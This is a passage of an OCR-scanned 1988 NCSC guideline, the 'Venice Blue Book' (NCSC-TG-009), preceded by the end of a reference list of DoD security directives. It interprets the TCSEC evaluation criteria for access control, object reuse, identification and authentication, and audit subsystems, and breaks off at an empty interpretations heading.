   June 1985.

2. DoD Directive 5215.1, "Computer Security Evaluation Center," 25 October
   1982.

3. DoD Regulation 5200.1-R, Information Security Program Regulation,
   August 1982.

4. DoD Computer Security Center, DoD Trusted Computer System Evaluation
   Criteria, CSC-STD-001-83, IS August 1983.

5.  Army Regulation 380-380, Automated Systems Security, IS June 1979.

6. Office of the Chief of Naval Operations (OPNAV) Instruction 5239. IA
   "Department of the Navy Automatic Data Processing Security Program," 3'
   August 1982.

7. Air Force Regulation 205-16, Automated Data Processing System (ADPS)
   Security Policy, Procedures, and Responsibilities, I August 1984.

8. Marine Corps Order P5510.14, Marine Corps Automatic Data Processing
   (ADP) Security Manual, 4 November 1982.

9. DoD Directive 5220.22, "DoD Industrial Security Program," 8 December
   1980.

10. DoD Directive 5200.28, "Security Requirements for Automatic Data
   Processing Systems," 29 April 1978.

11. DoD Manual 5200.28-M, ADP Security Manual - Techniques and
   Procedures for Implementing, Deactivating, Testing, and Evaluating
   Secure Resource-Sharing ADP Systems, 25 June 1979.

12. Defense Intelligence Agency Manual (DIAM) 50-4, "Security of
   Compartmented Computer Operations (U)," 24 June 1980,
   CONFIDENTIAL.

13. National Security Agency/Central Security Service (NSA/CSS) Directive
   10-27, "Security Requirements for Automatic Data Processing (ADP)
   Systems," 29 March 1984.

14.  Director of Central Intelligence Directive (DCID), "Security Controls on
   the Dissemination of Intelligence Information (U)," 7 January 1984,
   CONFIDENTIAL.
                                   40

15.  DoD Directive 5400.7, "DoD Freedom of Information Act Program," 24
     April 1980.

16.  Office of the Secretary of Defense (OSD) Memorandum, "Control of
     Unclassified Technology with Military Application," 18 October 1983.

17.  Anderson, James P., "An Approach to Identification of Minimum TCB
     Requirements for Various Threat/Risk Environments," Proceedings of the
     1983 IEEE Symposium on Security and Privacy, 24-27 April 1983.

18.  Schell, Roger R., "Evaluating Security Properties of Systems," Proceedings
     of the IEEE Symposium on Security and Privacy, 24-27 April 1983.

19.  Defense Investigative Service (DIS) Manual 20-1, Manual for Personnel
     Security Investigations, 30 January 1981.

20.  DoD Regulation 5220.22-R, Industrial Security Regulation, January 1983.

21.  National Disclosure Policy - I, 9 September 1981.

22.  DoD Directive 5230.11, "Disclosure of Classified Military Information to
     Foreign Governments and International Organizations," 31 December
     1976.

23.  Title 35, United States Code, Section 181-188, "Patent Secrecy."

24.  Title 5, United States Code, Section 551, "Administrative Procedures Act."

25.  DoD Directive 5400.11, "Department of Defense Privacy Program," 9 June
     1982.

26.  DoD Directive 5100.36, "Defense Scientific and Technical Information
     Program," 2 October 1981.

27.  DoD Directive 5010.12, "Management of Technical Data," 5 December
     1968.

28.  Title 18, United States Code, Section 1905, "Disclosure of Confidential
     Information Generally."

29.  DoD Directive 5200.1, "DoD Information Security Program," 7 June 1982.

30.  Office of Management and Budget (OMB) Circular No. A-71, Transmittal
     Memorandum No. I, "Security of Federal Automated Information Systems,
     27 July 1978.

31.  Joint Chiefs of Staff (JCS) Staff Memorandum (SM) 313-83, Safeguarding
     the Single Integrated Operational Plan (SIOP) (U), 10 May 1983, SECRET.

                                  41

32.  "Security Policy on Intelligence Information in Automated Systems and
     Networks (U)," Promulgated by the DCI, 4 January 1983,  CONFIDENTIAL.

33.  Director of Central Intelligence Computer Security Manual (U), Prepared
     for the DCI by the Security Committee, 4 January 1983, CONFIDENTIAL.

34.  DoD Directive 5210.2, "Access to and Dissemination of Restricted Data," 12
     January 1978.

35.  DoD Instruction C-5210.21, "Implementation of NATO Security Procedure
     (U)," 17 December 1973, CONFIDENTIAL.

The Venice Blue Book: Computer Security Subsystems (September 1988)

NCSC-TG-009 - Computer Security Subsystems
Library No. S230,512 
Version 1 
FOREWORD
This publication is issued by the National Computer Security Center (NCSC) as part of its program to promulgate technical computer security guidelines. This interpretation extends the Department of Defense Trusted Computer System Evaluation Criteria (DOD 5200.28-STD) to computer security subsystems. 
This document will be used for a period of at least one year after date of signature. During this period the NCSC will gain experience using the Computer Security Subsystem Interpretation in several subsystem evaluations. After this trial period, necessary changes to the document will be made and a revised version issued. 
Anyone wishing more information, or wishing to provide comments on the usefulness or correctness of the Computer Security Subsystem Interpretation may contact: Chief Technical Guidelines Division, National Computer Security Center, Fort George G. Meade, MD 20755-6000, ATTN: Cll. 
PATRICK R GALLAGHER, JR. 16 September 1988 
Director National Computer Security Center 
Computer Security Subsystems ACKNOWLEDGEMENT 
ACKNOWLEDGEMENT
Acknowledgment is extended to the members of the working group who produced this Interpretation. Members were: Michael W. Hale, National Computer Security Center (Chair); James P. Anderson; Terry Mayfie!d, Institute For Defense Analyses; Alfred W. Arsenault, NCSC; William Geer, NCSC; John C. Inglis, NCSC; Dennis Steinauer, National Bureau of Standards; Mario Tinto, NCSC; Grant Wagner, NCSC; and Chris Wilcox, NCSC. 
Acknowledgement is further extended to those individuals who conducted thorough reviews and and provided constructive comments on this document. Reviewers included: Steve Lipner, Earl Boebert, Virgil Gligor, Debbie Downs, Len Brown, Doug Hardie, Steve Covington, Jill Sole and Bob Morris. 
1. INTRODUCTION
This document provides interpretations of the Department of Defense Trusted Computer System Evaluation Criteria (DoD 5200.28-STD or TCSEC) for computer security subsystems. A computer security subsystem (subsystem) is defined, herein, as hardware, firmware and/or software which can be added to a computer system to enhance the security of the overall system. A subsystem's primary utility is to increase the security of a computer system. The computer system that the subsystem is to protect is referred to as the protected system in this Interpretation. 
When incorporated into a system environment, evaluated computer security subsystems may be very effective in reducing or eliminating certain types of vulnerabilities whenever entire evaluated systems are unavailable or impractical. 
1.1 PURPOSE
This Interpretation has been prepared for the following purposes: 
1. to establish a standard for manufacturers as to what security features and assurance levels to build into their new and planned computer security subsystem products to provide widely available products that satisfy trust requirements for sensitive applications; 
2. to provide a metric to evaluate the degree of trust that can be placed in a subsystem for protecting classified and sensitive information; 
3. to lend consistency to evaluations of these products by explicitly stating the implications that are in the TCSEC; and 
4. to provide the security requirements for subsystems in acquisition specifications. 
1.2 BACKGROUND
The Department of Defense Trusted Computer System Evaluation Criteria (DoD 5200.28-STD or TCSEC) was developed to establish uniform DoD policy and security requirements for "trusted, commercially available, automatic data processing (ADP) systems." Evaluation criteria defined in the TCSEC provides a standard to manufacturers as to what security features to build into their commercial products to satisfy trust requirements for sensitive applications, and serves as a metric with which to evaluate the degree of trust that can be placed in a computer system for the secure processing of classified or other sensitive information. 
The TCSEC specifies a variety of features that a computer system must provide to constitute a complete security system. The security requirements specified in the TCSEC depend on and complement one another to provide the basis for effective implementation of a security policy in a trusted computer system. The effectiveness of any one security feature present within a system is, therefore, dependent to some degree on the presence and effectiveness of other security features found within the same system. Because it was intended to be used only for systems which incorporated all the security features of a particular evaluation class, the TCSEC does not, in all cases, completely specify these interdependencies among security features. 
In addition to the class of trusted system products, there exists a recognized need for a class of computer security products which may not individually meet all of the security features and assurances of the TCSEC. Instead, these products may implement some subset of the features enumerated in the TCSEC and can potentially improve the security posture in existing systems. These products are collectively known as computer security subsystems. 
Evaluation of computer security subsystems against a subset of the requirements given in the TCSEC has proven an extremely difficult task because of the implied dependencies among the various features discussed in the TCSEC. As a consequence, interpretations of these interdependencies and the relative merits of specific subsystem implementations have been highly subjective and given to considerable variation. 
This document provides interpretations of the TCSEC for computer security subsystems in an effort to lend consistency to evaluations of these products by explicitly stating the implications in the TCSEC. 
Evaluations can be divided into two types: (l) a product evaluation can be perforrned on a subsystem from a perspective that excludes the application environment, or (2) a certification evaluation can be done to assess whether appropriate security measures have been taken to permit an entire system to be used operationally in a specific environment. The product evaluation type is done by the National Computer Security Center (NCSC) through the Trusted Product Evaluation Process using this interpretation for subsystems. The certification type of evaluation lS done in support of a formal accreditation for a system to operate in a specific environment using the TCSEC. 
1.3 SCOPE
This document interprets the security feature, assurance and documentation requirements of the TCSEC for subsystem evaluations. In this interpretation, the functional requirements of the TCSEC are divided into four general categories: 
1. Discretionary Access Control (DAC) 
2. Object Reuse (OR). 
3. Identification and Authentication (I&A) 
4. Audit (AUD) 
These categories form the basis for classifying products to be evaluated as computer security subsystems. 
The document, in addition to this introductory section, is organized into three major sections and a glossary. Section 2 contains the feature requirements for each of the above four categories on which subsystems evaluations are based. The requirements in this section are listed in increments, with only new or changed requirements being added for each subsequent class of the same feature. All requirements that are quoted from the TCSEC are in bold print for easy identification and are clarified, in the context of subsystems, by interpretation paragraphs. 
Section 3 contains the assurance requirements for all subsystems. The assurances that are relevant to each category are listed here in the same format as the requirements in Section 2. Section 4 contains the requirements and interpretations for subsystem documentation, again, in the same forrnat as Section 2. 
The TCSEC-related feature and assurance requirements described herein are intended for the evaluation of computer security subsystems designed to protect sensitive information. This Interpretation, like the TCSEC, assumes that physical, administrative, and procedural protection measures adequate to protect the inforrnation being handled are already in place. 
This Interpretation can be used to support a certification evaluation. In fact, it would be helpful whenever subsystems are a part of the overall system being certified. 
1.4 EVALUATION OF SUBSYSTEMS
1.4.1 Basis for Evaluation
Subsystems are evaluated for the specific security-relevant functions they perforrn. This Interpretation interprets the relevant TCSEC requirements for each function evaluated. So the function(s) for which subsystems are evaluated will be identified within its ratings. Each function has its own set of ratings as identified in Table 1.1. Subsystems that are evaluated for more than one function will receive a separate rating for each function evaluated. 
TABLE 1.1. Possible Subsystem Ratings 
SUBSYSTEM FUNCTION                   POSSIBLE RATINGS                      

Discretionary Access Control         DAC/D, DAC/Dl, DAC/D2, DAC/D3         

Object Reuse                         OR/D,OR/D2                            

Identification & Authentication      I&A/D, I&A/Dl, I&A/D2                 

Audit                                AUD/D, AUD/D2, AUD/D3                 

Although the requirements for subsystems are derived from the TCSEC, the ratings for subsystems will not directly reflect the TCSEC class they are derived from. Since subsystems, by their very nature, do not meet all of the requirements for a class Cl or higher computer system, it is most appropriate to associate subsystem ratings with the D division of the TCSEC. This Interpretation defines the Dl, D2 and D3 classes within the D division for subsystems. The Dl class is assigned to subsystems that meet the interpretations for requirements drawn from the Cl TCSEC class. Likewise, the D2 class consists of requirements and interpretations that are drawn from the C2 TCSEC class. The D3 subsystem class is reserved for DAC subsystems and audit subsystems that meet the B3 functionality requirements for those functions. 
In addition to meeting the functionality requirements and interpretations, subsystems must also meet the assurance and documentation requirements in sections 3 and 4 of this document. The Dl and D2 classes have requirements and interpretations for ~ssurances and documentation as well as functionality. 
The D3 class contains additional requirements and interpretations only for functionality, not for assurances or documentation. So, subsystems with this rating will adhere to the D2 assurance and documentation requirements and interpretations. 
Like the classes within the TCSEC, the Dl, D2 and D3 classes are ordered hierarchically. Subsystems being evaluated for the Dl class must meet the requirements and interpretations for the Dl class. Subsystems being evaluated for the D2 class must meet the requirements and interpretations for the Dl class plus the additional requirements and interpretations for the D2 class. Subsystems being evaluated for the D3 class must meet the additional requirements and interpretations associated with the functionality at D3. 
Although the subsystem requirements and interpretations are derived directly from the TCSEC, subsystems are not considered to be complete computer security solutions. There is no general algorithm to derive a system rating from an arbitrary collection of computer security subsystems. Any collection of individually evaluated subsystems must be evaluated as a whole to determine the rating of the resulting system. The ratings of the individual subsystems in a complete system are not a factor in the rating of that system. 
1.4.2 Integration Requirements
Because all of the TCSEC requirements for a given rating class were intended to be implemented in a complete computer security system, many of the security features are dependent upon each other for support within the system. This poses a certain degree of difficulty with extracting only the relevant requirements from the TCSEC for a given feature. Further, this poses a fundamental problem for subsystems because there is an explicit dependency between security features that restricts the "independent" incorporation of subsystems into the system's environment. The problem has been handled in this Interpretation by discussing the integration requirements for each type of subsystem. The requirements for integration are discussed for each type of subsystem in a sub-section entitled, "Role Within Complete Security System." Furthermore, explicit requirements for integration are stated in the interpretations at appropriate points. The developer must show, and the evaluation shall validate, that the subsystem can be integrated into a system to fulfill its designated role. 
Most all computer security subsystems will rely on other security-relevant functions in the enviromnent where they are implemented. Audit subsystems, for example, depend on an identification and authentication function to provide the unique user identities that are necessary for individual accountability. Also, it is important to realize that some of these functions may be dependent on each other in a cyclic fashion (e.g., I&A depends on DAC and DAC depends on I&A). In these cases, the cyclic dependencies should be removed either by complete integration of the functions or by modularizing the functions in a way that allows linear dependencies. Tl~is latter method is termed "sandwiching" and it requires the splitting of one function and surroundmg the other dependent function with the two functions resulting from the split. For example, in the case of DAC and I&A cyclic dependencies, one might split I&A into two parts so that there is a system I&A, a DAC subsystem, and a DAC module containing its own I&A functionality. 
With the exception of object reuse, all functions implemented by subsystems will be dependent on other functions as shown in Table 1.2. The functions upon which any subsystem is dependent will be referred to as that subsystem's required supporting functions. These required supporting functions must be present in the subsystem's environment for the effective integration of the subsystem. 
TABLE 1.2. Required Supporting Functions 
SUBSYSTEM FUNCTION                   REQUIRED SUPPORTING FUNCTIONS         

Discretionary Access Control         I&A, Audit                            

Object Reuse                         None                                  

Identification & Authentication      Audit,DAC2, Audit, I&A, DAC2          

Subsystems that are not self-sufficient in providing required supporting functions must, at a minimum, provide an interface to their required 
supporting functions. The evaluation team will perform tests to show whether the interface to the required supporting functions is reliable and works properly. The robustness of the required supporting functions on the other side of the interface will not be tested, as the scope of the subsystem evaluation is bounded by the interface. 
A more integrated solution is for subsystems to be self- su~cient in providing all of their required supporting functions. Such subsystems w_ill be evaluated and assigned a separate rating for each function they provide. Unlike the previous solution, where only an interface is provided, each required supporting function is performed by the subsystem and must be a part of the subsystem evaluation. 
The audit supporting functions are required at D2. 2 Audit and/or authentication data must be protected through domain isolation or DAC. 
1.4.3 WARNING
An overan system rating, such as that provided by the TCSEC, cannot be inferred from the application of one or more separately-rated subsystems. Mechanisms, interfaces, and the extent of required supporting functions for each subsystem may differ substantiany and may introduce significant vulnerabilities that are not present in systems where security features are designed with fun knowledge of interfaces and host system support. Therefore, incorporation of an evaluated subsystem into any system environment does not automaticany confer any rating to the resulting system. 
2. FEATURE REQUIREMENTS
2.1 DISCRETIONARY ACCESS CONTROL DAC) SUBSYSTEMS
2.1.1 Global Description of Subsystem Features
2.1.1.1 Purpose
This subsystem provides user-specified, controlled sharing of resources. 
This control is established from security policies which define, given identified subjects and objects, the set of rules that are used by the system to determine whether a given subject is authorized to gain access to a specific object. 
DAC features include the means for restricting access to objects; the means for instantiating authorizations for objects; and the mechanisms for distribution, review, and revocation of access privileges, especially during object creation and deletion. 
2.1.1.2 Role Within Complete Security System
The requirement is to give individual users the ability to restrict access to objects created or controlled by them. Thus, given identified subjects and objects, DAC includes the set of rules (group-oriented and/or individually-oriented) used by the subsystem to ensure that only specified users or groups of users may obtain access to data (e.g., based on a need-to-know). 
A DAC subsystem controls access to resowces. As such, it shall be integrable with the operating system of the protected system and shall mediate all accesses to the protected resources. To fully protect itself and the resources it controls, the DAC subsystem must be interfaced to the protected system in such a way that it is tamperproof and always invoked. 
DAC subsystems use the identifiers of both subjects and DAC-controlled objects as a basis for access control decisions. Thus, they must be supplied with the identifiers in a reliable manner. The DAC subsystem may supply subject identification for itself or it may rely on an I&A mechanism in the protected system or in another subsystem. It is also essential that DAC subsystems be implemented in an environment where the objects it protects are well defined and uniquely identified. 
At the DAC/D2 class, the DAC subsystem must interface with an auditing mechanism. This auditing mechanism can be included within the DAC subsystem, or it may reside elsewhere in the subsystem's environment. 
2.1.2 Evaluation of DAC Subsystems
Subsystems which are designed to implement discretionary access controls to assist a host in controlling the sharing of a collection of objects must comply with all of the TCSEC requirements as outlined below for features, assurances and documentation. Compliance with these requirements will assure that the subsystem can enforce a specifically defined group-oriented and/or individually-oriented discretionary access control policy. 
As a part of the evaluation, the subsystem vendor shall set up the subsystem in a typical functional configuration for security testing. This will show that the subsystem interfaces correctly with the protected system to meet all of the feature requirements in this section and ali of the assurance and documentation requirements in Sections 3 and 4. It will also show that the subsystem can be integrated into a larger system environment. 
The interpretations for applying the feature requirements to DAC subsystems are explained in the subsequent interpretations sections. The application of the assurances requirements and documentation requirements is explained in Sections 3 and 4, respectively. 
2.1.3 Feature Requirements For DAC Subsystems
2.1.3.1 DAC/Dl
TCSEC Quote: 
"Cl: New: The TCB shall define and control access between named users and named objects (e.g., files and programs) in the ADP system. The enforcement mechanism (e.g., self/group/public controls, access control lists) shall allow users to special and control sharing of those objects by named indinduals or defined groups or both." 
Interpretation: 
In the TCSEC quote, "TCB" is interpreted to mean "DAC subsystem". 
2.1.3.1.1 Identified users and objects
DAC subsystems must use some mechanism to determine whether users are authorized for each access attempted. At DAC/Dl, this mechanism must control access by groups of users. The mechanisms that can meet this requirement include, but are not limited to: access control lists, capabilities, descriptors, user profiles, and protection bits. The DAC mechanism uses the identification of subjects and objects to perform access control decisions. This implies that the DAC subsystem must interface with or provide some I&A mechanism. The evaluation shall show that user identities are available to DAC. 
2.1.3.1.2 User-specified object sharing
The DAC subsystem must provide the capability for users to specify how other users or groups may access the objects they control. This requires that the user have a means to specify the set of authorizations (e.g., access control list) of all users or groups permitted to access an object and/or the set of all objects accessible to a user or group (e.g., capabilities). 
2.1.3.1.3 Mediation
The checking of the specified authorizations of a user prior to granting access to an object is the essential function of DAC which must be provided. Mediation either allows or disallows the access. 
2.1.3.2 DAC/D2
TCSEC Quote: 
"C2: Change: The enforcement mechanism (e.g. self/group/public controls, access control lists) shall allow users to specify and control sharing of those objects by named individuals, or defined groups of individuals, or by both, and shan provide controls to limit propagation of access rights." 
"C2: Add: The discretionary access control mechamsm shan, either by explicit user action or by default, provide that objects are protected from unauthorized access. These access controls s~ll be capable of including or excluding access to the granularity of a single wer. Access permission to an object by users not already possessing access pernlission shan only be assigned by authorized users." 
Interpretation: 
The following interpretations, in addition to the interpretations for the DAC/Dl Class, shall be satisfied at the DAC/D2 Class. 
2.1.3.2.1 DAC/D2
The DAC/D2 class requires mdividual access controls; therefore, the granularity of user identification must enable the capabili~ to discern an individual user. That is, access control based upon group identi~ alone is insufflcient. To comply with the requirement, the DAC subsystem must either provide unique user identities through its own I&A mechanism or Mterface with an I&A mechanism that provides unique user identities. The DAC subsystem must be able to interface to an auditing mechanism that records data about access mediation events. The evaluation shall show that audit data is created and is available to the auditing mechanism. 
2.1.3.2.2 Authorized user-specified object sharing
The ability to propagate access rights to objects must be lirnited to authorized users. This additional feature is incorporated to limit access rights propagation. This distribution of privileges encompasses granting, reviewing, and revoking of access. The ability to grant the right to grant propagation of access will itself be limited to authorized users. 
2.1.3.2.3 Default protection
The DAC mechanism must deny all users access to objects when no explicit action has been taken by the authorized user to allow access. 
2.1.3.3 DAC/D3
· TCSEC Quote: 
"B3: Change: The enforcement mechanism (e.g., access control lists) shall allow users to specify and control sharing of those objects, and shall provide controls to limit propagation of access rights. These access controls shall be capable of specifying, for each named object, a list of named individuals and a list of groups of named individuals with their respective modes of access to that object." 
"Add: Furtherrnore, for each such named object, it shall be possible to specify a list of named individuals and a list of groups of named individuals for which no access to the object is to be given." 
· Interpretation: 
The following interpretation, in addition to the interpretations and 
requirements for the DAC/D2 class, shall be satisfied for the DACID3 class. 
2.1.3.3.1 Access control lists for each object
The DAC subsystem shan anow users to specify the list of individuals or groups of individuals who can access each object. The list shan additionally specify the mode(s) of access that is anowed each user or group. This implies that access control lists associated with each object is the only acceptable mechanism to satisfy the DAC/D3 requirement. 
2.1.4 Assurance Requirements for DAC Subsystems
DAC subsystems must comply with an of the assurance requirements for their given class as indicated below. The interpretations for these assurance requirements are contained in Section 3. 
Subsystems at the DAC/Dl class must comply with: 
· System Architecture (Dl) 
· System Integrity (Dl) 
· Security Testing (Dl) 
Subsystems at the DAC/D2 and DAC/D3 classes must comply with: 
· System Architecture (D2) 
· System Integrity (D2) 
· Security Testing (D2) 
2.1.5 Documentation Requirements for DAC Subsystems
DAC subsystems must meet the documentation requirements listed below for their target rating class. The interpretations for these documentation requirements are contained in Section 4. 
Subsystems at the DAC/Dl class must comply with: 
· Security Features User's Guide (Dl) 
· Trusted Facility Manual (Dl) 
· Test Documentation (Dl) 
· Desi~ Documentation (Dl) 
Subsystems at the DAC/D2 and DAC/D3 classes must comply with: 
· Security Features User's Guide (D2) 
· Trusted Facility Manual (D2) 
· Test Documentation (D2) 
· Design Documentation (D2) 
2.2 OBJECT REUSE SUBSYSTEMS
2.2.1 Global Description of Subsystem Features
2.2.1.1 Purpose
Object reuse subsystems clear storage objects to prevent subjects from scavenging data from storage objects which have been previously used. 
2.2.1.2 Role Within the Complete Security System
Object reuse can be used to prevent information scavenging by erasing information residue contained in previously used storage objects that have been released by the storage management system. Object reuse subsystems are most effective in environments where some security policy is implemented on the system. 
To prevent scavenging of information from previously used storage objects, object reuse subsystems must be fully integrable with the operating system of the protected system. The object reuse subsystem must perform its function for all reusable storage objects on the protected system (i.e., main memory, disk storage, tape storage, I/O buffers, etc.). 
Object reuse subsystems must be interfaced with the protected system in such a way that they are tamperproof and always invoked. 
2.2.2 Evaluation of Object Reuse Subsystems
Subsystems which implement object reuse must comply with all of the TCSEC requirements as outlined below for features, assurances, and documentation. Compliance with these requirements will show that the subsystem can enforce object reuse adequately to receive an OR/D2 rating for object reuse. 
As a part of the evaluation, the subsystem vendor shall set up the subsystem in a typical functional connguration for security testing. This will show that the subsystem interfaces correctly with the protected system to meet all of the feature requirements in this section and all of the assurance and documentation requirements in Sections 3 and 4. It will also show that the subsystem can be integrated into a larger system environment. 
The interpretations for applying the feature requirements of object reuse subsystems are explained in the subsequent interpretations section. The application of the assurance requirements listed below is explained in Sections 3 and 4, respectively. 
2.2.3 Feature Requirements for Object Reuse Subsystems
2.2.3.1 OR/D2
TCSEC Quote: 
"C2: New: all authorizations to the information contained within a storage object shall be revoked prior to initial assignment, allocation or reallocation to a subject from the TCB's pool of unused storage objects. No information, including encrypted representations of information, produced by a prior subject's actions is to be available to any subject that obtains access to an object that has been released back to the system." 
Interpretation: 
In the TCSEC quote, "TCB" is interpreted to mean "protected system". Otherwise, this requirement applies as stated. The object reuse subsystem shall perform its function for all storage objects on the protected system that are accessible to users. 
Rationale/Discussion: 
Object reuse subsystems must assure that no previously used storage objects (e.g., message buffers, page frames, disk sectors, magnetic tape, memory registers, etc.) can be used to scavenge residual information. Information remaining in previously used storage objects can be destroyed by overwriting it with meaningless or unintelligible bit patterns. An alternative way of approaching the problem is to deny read access to previously used storage objects until the user who has just acquired them has overwritten them with his own data. 
Object reuse subsystems do not equate to systems used to eliminate magnetic remnance. 
2.2.4 Assurance Requirements for Object Reuse Subsystems
Object reuse subsystems must comply with all of the assurance requirements shown below for the D2 class. The interpretations for these assurance requirements for Object Reuse subsystems are contained in Section 3. 
· System Architecture (D2) 
· System Integrity (D2) 
· Security Testing (D2) 
2.2.5 Documentation Requirements for Object ReuseSubsystems 
Object reuse subsystems must meet the documentation requirements shown below for the D2 class. The interpretations for these documentation requirements are contained in Section 4. 
· Security Features User's Guide (D2) 
· Trusted Facility Manual (D2) 
· Test Documentation (D2) 
· Design Documentation (D2) 
2.3 IDENTICATION & AUTHENTICATION (I&A) SUBSYSTEMS 
2.3.1 Global Description of Subsystem Features
2.3.1.1 Purpose
This subsystem provides the authenticated identification of a user seeking to gain access to any resources under the control of the protected system. 
2.3.1.2 Role Within Complete Security System
The I&A subsystem provides an authenticated user identification needed to provide accountability for and control access to the protected system. The granularity of user identification is determined by the requirements in this interpretation. The granularity increases from group identification at I&A/Dl to individual identification at I&A/D2. 
The requirement is to be able to accurately authenticate the claimed identity of a user. The I&A subsystem must determine whether a user is authorized to use the protected system. For all authorized users, the I&A subsystem communicates the identity of the user to the protected system. This identity can then be used by the protected system or other subsystems to provide accountability for use of the system and access controls to protected objects on the system. To be effective and to protect the authentication data it uses, the I&A subsystem must be tamperproof and always invoked. 
At I&A/D2, it is important that all uses of the I&A subsystem be recorded in an audit trail. The auditing of these actions may be performed entirely by the auditing mechanism on the I&A subsystem, or through an interface with an auditing mechanism in the protected system or another subsystem. 
2.3.2 Evaluation of I&A Subsystems
Subsystems which are designed to implement I&A must comply with all of the TCSEC requirements outlined below for features, assurances, and documentation. Compliance with these requirements will assure that the subsystem can enforce, either wholly or in part, a specific I&A policy. As a part of the evaluation, the subsystem vendor shall set up the subsystem in a typical functional configuration for security testing. This will show that the subsystem interfaces correctly with the protected system to meet all of the feature requirements in this section and all of the assurance and documentation requirements in Sections 3 and 4. It will also show that the subsystem can be integrated into a larger system environment. 
The interetations for applying the feature requirements to I&A subsystems are explained in the subsequent interpretations sections. The application of the assurance requirements and documentation requirements listed in the next section is explained in Sections 3 and 4, respectively. 
2.3.3 Feature Requirement for I&A Subsystems
2.3.3.1 I&A/Dl
TCSEC Quote: 
"Cl: New: The TCB shall require users to identify themselves to it before beginning to perform any other actions that the TCB is expected to mediate. Furthermore, the - TCB shall use a protected mechanism (e.g., passwords) to authenticate the user's identity. The TCB shall protect authentication data so that it cannot be accessed by any unauthorized user." 
Interpretation: 
The I&A subsystem shall require users to identify themselves to it before beginning to perforrn any other actions that the system is expected to mediate. Furthermore, the I&A subsystem shall use a protected mechanism (e.g., passwords) to authenticate the user's identity. The I&A subsystem shall protect authentication data so that it cannot be accessed by any unauthorized user. 
The I&A subsystem shall, at a minimum, identify and authenticate system users. At I&A/Dl, users need not be individually identified. 
Rationale/Discussion: 
Identification and Authentication must be based on at least a two-step process, which is derived from a combination of something the user possesses (e.g., smart card, magnetic stripe card), some physical attribute about the user (e.g., fingerprint, voiceprint), something the user knows (e.g., password, passphrase). The claimed identification of a user must be authenticated by an explicit action of the user. It is not acceptable for one step to be used as both identification and authentication. The claimed identity can be public. The measure used for authentication must be resistant to forging, guessing, and fabricating. 
The I&A subsystem must interface to the protected system in such a way that it can reliably pass authenticated user identities to the protected system. The evaluation shall show that authenticated user identities can be passed to the protected system. 
2.3.3.2 I&A/D2
TCSEC Quote: - 
"C2: Add: The TCB shan be able to enforce individual accountability by providing the capability to uniqueb identify each individual ADP system user. The TCB shall also ; provide the capabmty of associa~ ~is identity ~nth an auditable actiol~ taken by ; that indindual." 
Interpretation ~ 
The following interpretations, in addition to those interpretations for I&A/Dl, shall be satisfied at the I&A/D2 Class. 
In the TCSEC quote, "TCB" is interpreted to mean "I&A subsystem." The I&A subsystem shall pass to the protected system a unique identifier for each individual. 
The I&A subsystem shall be able to uniquely identify each individual user. This includes the ability to identify individual members within an authorized user group and the ability to identify specific system users such as operators, system administrators, etc. 
The I&A subsystem shall provide for the audit logging of security-relevant I&A events. For I&A, the origin of the request (e.g., terminal ID, etc.), the date and time of the event, user ID (to the extent recorded), type of event, and the success or failure of the event shall be recorded. The I&A subsystem may meet this requirement either through its own auditing mechanism or by providing an interface for passing the necessary data to another auditing mechanism. , 
Rationale/Discussion: 
The intent of this requirement is for the I&A subsystem to supply a unique identity for each user to the protected system. The subsystem supplies a unique user identity which may or may not be used by an auditing mechanism. This auditing support is : required to maintain consistency with the C2 level of trust as defined by the TCSEC. 
2.3.4 Assurance Requirements for I&A Subsystems
I&A subsystems must comply with all of the assurance requirements listed below for their given class. The interpretations for these assurance requirements to I&A subsystems are contained in Section 3. 
Subsystems at the I&A/Dl class shall comply with: 
· System Architecture (Dl) 
· System Integrity (Dl) 
· Security Testing (Dl) . 
Subsystems at the I&A/D2 class shall comply with: 
· System Architecture (D2) 
· System Integrity (D2) 
· Security Testing(D2) 
2.3.5 Documentation Requirements for I&A Subsystems
I&A subsystems must meet the documentation requirements listed below for their target rating class. The interpretations for these documentation requirements are contained in Section 4. 
Subsystems at the I&A/Dl class shall comply with: 
· Security Features User's Guide (Dl) 
· Trusted Facility Manual (Dl) 
· Test Documentation (Dl) 
· Design Documentation (Dl) 
Subsystems at the I&A/D2 class shall comply with: 
· Security Features User's Guide (D2) 
· Trusted Facility Manual (D2) 
· Test Documentation (D2) 
· Design Documentation (D2) 
2.4 AUDlT SUBSYSTEMS
2.4.1 Global Description of Subsystem Features
2.4.1.1 Purpose
Accountability is partly achieved through auditing. That is, data from security- relevant events is captured and passed to the audit mechanism to be recorded for use in detecting possible security breaches and providing a trace to the party responsible. 
2.4.1.2 Role Within Complete Security System
The requirement is to be able to record security-relevant events in a manner that will allow detection and/or after-the-fact investigations to trace security violations to the responsible party. 
An auditing subsystem must be capable of recording all security-relevant actions -i - that take place throughout the computer system. To accomplish this goal, it must integrate itself into the mechanisms that mediate access and perform user identification and authentication, and capture data about the events they control. Additionally, an audit subsystem must be interfaced with the protected system in such a way that it is tamperproof and always invoked. 
The auditing subsystem must be provided all of the necessary data associated with actions as specified in Section 2.4.3. The necessary data includes the unique identity of the user that is responsible for each action. This implies that an auditing subsystem must be augmented by an identification and authentication mechanism either within the subsystem itself or elsewhere on the system. 
2.4.2 Evaluation of Auditing Subsystems
Subsystems which are designed to implement audit data collection and control functions for a host must comply with all of the TCSEC requirements as outlined below for features, assurances and documentatioi. Compliance with these features will assure that the subsystem, through its integration, can detect or generate the relevant audit data or can record all relevant audit data passed to it by the host or other subsystems. 
As a part of the evaluation, the subsystem vendor shall set up the subsystem in a typical functional configuration for security testing. This will show that the subsystem interfaces correctly with the protected system to meet all of the feature requirements in this section and all of the assurance and documentation requirements in Sections 3 and 4. It will also show that the subsystem can be integrated into a larger system environrnent. 
The interpretations for applying the feature requirements to auditing subsystems are explained in the subsequent interpretations sections. The application of the assurance requirements and documentation requirements is explained in Sections 3 and 4, respectively. 
2.4.3 Feature Requirements For Auditing Subsystems
2.4.3.1 AUD/D2
TCSEC Quote: 
"C2: New: The TCB shan be able to create, maintain, and protect from modification or unauthorized access or destruction an audit trail of accesses to the objects it protects. The audit data shan be protected by the TCB so that read access to it is limited to those who are authorized for audit data. The TCB shall be able to record the following types of events: use of identification and authentication mechanisms introduction of objects into a user's address space (e.g., file open, program ~. initiation), deletion of objects, actions taken by computer operators and system administrators and/or system security officers, and other security relevant events. For each recorded event, the audit record shall identify: date and time of the event, ~ user, type of event, and success or failure of the event. For identincation/authentication events the origin of request (e.g., terminal ID) shan be - included in the audit record. For events that introduce an object into a user's address space and for object deletion events the audit record shall include the name of the object. rne ADP system administrator shall be able to selectively audit the actions of any one or more users based on individual identity." 
Interpretations: 
